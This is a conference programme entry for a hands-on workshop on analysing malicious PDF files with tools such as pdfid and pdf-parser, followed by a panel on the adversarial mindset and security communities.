Hands-on workshop : Malware Attack in PDFs: An Adversary Real Attack Analysis

15:00-17:00 PDT Friday | Aug 8^th 2025
Adversary Village workshop stage | Las Vegas Convention Center
Adversary Tradecraft

This Workshop delves deep into the intricate structures of PDF files, offering a meticulous analysis of each segment. Unveiling the covert strategies of threat actors, we explore how they ingeniously incorporate malicious components into file structures. The session elucidates the meticulous collection of IOCs (Indicators of Compromise) and the construction of IOAs (Indicators of Attack) for behavioral analysis, empowering defenders to anticipate and thwart novel attack vectors.
Our technical journey navigates through the PDF file's anatomy, encompassing headers, bodies, cross-reference tables, and trailers. Live demonstrations dissect malicious PDFs using tools like pdfid, pdf-parser, and pdftk, providing hands-on insights into the analysis process. The presentation unravels encoding techniques and exposes threat actors' methodologies in establishing Command and Control (C&C) channels within PDF files. The session concludes with an opportunity for questions, equipping participants with advanced knowledge for robust malware analysis and proactive defense strategies.

Detailed workshop outline

• 1. What is Malware Analysis?
  • Malware: Software meant to harm, steal, or take control.
  • Analysis: Figuring out what the malware does and how it works.
  • Types of Analysis
    • Static analysis: Looking at the file without running it (inspect structure, code).
    • Dynamic analysis: Running it in a safe, controlled way to observe its behavior.
• 2. How PDF Malware Works
  • PDF is a document format, but can hold code like JavaScript.
  • Attackers hide malware in parts of PDF or with code inside files.
• 3. Inside a PDF File
  • Header: Says it’s a PDF.
  • Body: Holds pages, images, or scripts.
  • Cross-reference table (xref): Lists where things are in the file.
  • Trailer: Marks the end of the file.
• 4. How Attackers Hide Malware in PDFs
  • Use JavaScript: Code that runs when opening the PDF.
  • Use links (URIs): To redirect to a bad website.
  • Obfuscation: Making code hard to read (using encoding, hex, Unicode tricks).
• 5. How to Analyze a Malicious PDF (Simple Demo/Process)
  • Use pdfid to quickly check for dangerous parts (like JavaScript, URLs).
  • Use pdf-parser to look closer at suspicious parts or code.
  • Look for:
    • Embedded JavaScript
    • Unusual links/URIs
    • Encoded or strange-looking text
• 6. Spotting Command & Control (C2)
  • Attackers may hide servers in PDF that the malware connects to.
  • Sometimes info is hidden with simple tricks, like XOR encoding.
• 7. Demo Example Steps
  • Run pdfid to scan PDF.
  • If JavaScript is found, extract it with pdf-parser.
  • Check JS for weird code or links.
  • Try to decode any jumbled or encoded text.
• 8. Key Takeaways
  • PDF can be dangerous, not just a document.
  • Tools like pdfid and pdf-parser help spot and understand malware in PDFs.
  • Look for JavaScript, strange links, and encoded data in suspicious PDFs.

Panel discussion: Adversarial mindset and offensive cyber security, importance of security communities

17:00-18:00 PDT Friday | Aug 8^th 2025
Adversary Village workshop stage | Las Vegas Convention Center
Adversary Village Panel
Adversarial mindset

This panel brings together offensive cyber security experts and community leaders to explore the critical role of the adversarial mindset in modern cyber security. From red teaming and threat emulation to vulnerability research, we'll discuss how thinking like an attacker strengthens defense strategies.
e will also highlight the power of grassroots security communities in sharing knowledge, advancing tradecraft, and building the next generation of defenders. Join us for a conversation that bridges offense, defense, and the culture that makes it all possible.